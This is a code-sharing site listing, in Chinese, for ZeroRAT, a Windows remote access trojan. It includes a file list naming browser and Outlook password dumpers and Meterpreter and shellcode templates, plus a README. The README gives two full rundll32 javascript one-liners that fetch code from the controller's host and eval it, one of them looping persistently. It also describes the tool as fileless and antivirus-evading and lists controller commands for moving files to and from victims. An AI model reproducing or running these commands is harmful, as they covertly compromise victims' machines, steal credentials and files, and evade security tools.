ZeroRAT
所属分类:collect
开发工具:PowerShell
文件大小:0KB
下载次数:2
上传日期:2016-03-12 09:40:21
上 传 者:
sh-1993
说明: ZeroRAT是一款windows上的一句话远控,
(ZeroRAT is a one sentence remote control on Windows,)
文件列表:
clean.sh (50, 2016-03-12)
config.py (354, 2016-03-12)
controllers/ (0, 2016-03-12)
controllers/__init__.py (0, 2016-03-12)
controllers/client.py (5593, 2016-03-12)
controllers/server.py (9838, 2016-03-12)
install.py (1477, 2016-03-12)
models/ (0, 2016-03-12)
models/__init__.py (0, 2016-03-12)
models/action.py (1942, 2016-03-12)
models/download.py (1261, 2016-03-12)
models/settings.py (778, 2016-03-12)
models/upload.py (1290, 2016-03-12)
models/victim.py (1819, 2016-03-12)
payload.py (18614, 2016-03-12)
run.py (852, 2016-03-12)
sqlite.py (3783, 2016-03-12)
static/ (0, 2016-03-12)
static/js/ (0, 2016-03-12)
static/js/cli.js (13255, 2016-03-12)
static/js/jquery-1.12.0.min.js (97362, 2016-03-12)
static/js/jquery.ajax-retry.min.js (777, 2016-03-12)
static/js/jquery.browser.js (2234, 2016-03-12)
static/js/jquery.hotkeys-0.7.9.js (3081, 2016-03-12)
static/js/jquery.konami.js (1112, 2016-03-12)
static/js/xkcd_cli.js (11297, 2016-03-12)
static/style.css (2581, 2016-03-12)
static/tools/ (0, 2016-03-12)
static/tools/BrowserPasswordDump.exe (565248, 2016-03-12)
static/tools/OutlookPasswordDump.exe (279040, 2016-03-12)
static/tools/Rar.exe (473600, 2016-03-12)
templates/ (0, 2016-03-12)
templates/GatherInformation.ps1 (1358727, 2016-03-12)
templates/InstallUtilShellcodeExec.cs (3153, 2016-03-12)
templates/PowershellMeterpreterx86.ps1 (10990, 2016-03-12)
templates/index.html (2621, 2016-03-12)
templates/login.html (492, 2016-03-12)
templates/upfile.html (181, 2016-03-12)
#ZeroRAT
##简介
适用于windows的远控,客户端只需要执行一条指令,利用windows原生的程序执行,不在磁盘写文件,具有天然免杀的特性。重启失效。
程序里的download和upload都是以客户端的视角。客户端从服务端下载文件叫做download,客户端上传文件到服务端叫做upload。
##配置
在config.py中修改客户端上线的地址和后台的管理密码,记得要检查下把debug关掉。
程序依赖flask和sqlite3,自行pip安装
##客户端
把`
:`替换成实际上线的地址
正常版
```
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://:/connect",false);try{h.Send();B=h.ResponseText;eval(B);}catch(e){window.close();}
```
不死版
```
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://:/connect",false);while(1){try{h.Send();B=h.ResponseText;eval(B);}catch(e){}}
```
##服务端
后台: `http://:/server/`
服务端支持的命令有
* `sessions` 列出活动的客户端
* `use ` 根据id选择客户端
* `set ` 设置全局变量
* `show globals/downloads/uploads` 查看全局变量、客户端能下载的文件、客户端上传的文件
* `delete session` 删除当前客户端
* `delete download/upload ` 按照id删除文件
* `upfile` 上传文件到服务器,并添加到downloads列表
* `download` 设置好download_file和download_save_path两个变量即可让客户端下载文件并保存到download_save_path
* `upload` 设置upload_file变量,即可让客户端把upload_file的文件上传到服务器
* `backdoor tasks
近期下载者:
相关文件:
收藏者: